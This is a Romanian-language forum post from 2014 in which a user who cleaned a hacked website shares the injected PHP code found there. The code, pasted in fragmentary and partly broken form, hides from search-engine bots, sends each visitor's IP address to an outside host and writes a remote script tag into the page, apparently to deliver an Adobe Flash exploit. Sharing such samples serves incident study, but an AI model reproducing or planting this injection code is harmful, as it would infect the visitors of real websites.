dsp77 Posted May 7, 2014 Report Posted May 7, 2014 am curatat un site mai devreme care a fost spart de un bot prin brute force (parola de 5 caractere) si postez codul gasit in cazul in care cineva este interesat.<?phpif (empty($y)) { if ((substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) == '74.125') || preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])) { } else { error_reporting(0); @FreAd($socket, 4096)) !== FALSE) { $response .= $buf; } if ($buf === FALSE) { // Error reading response return FALSE; } $end_of_header = strpos($response, "\r\n\r\n"); return substr($response, $end_of_header + 4); } } if (empty($__var_to_echo) && empty($remote_domain)) { $_ip = $_SERVER['REMOTE_ADDR']; $y = "http://kilian.com.pl/k9zxjln4.php"; $y = __url_get_contents($y."?a=$_ip", 1); if (strpos($y, 'http://') === 0) { $__var_to_echo = '<script type="text/javascript" src="' . $y . '?id=95748648"></script>'; echo $__var_to_echo; } }}}?>se pare ca pagina de unde descarca fisierul nu mai exista. in orice caz se exploata adobe flash. Quote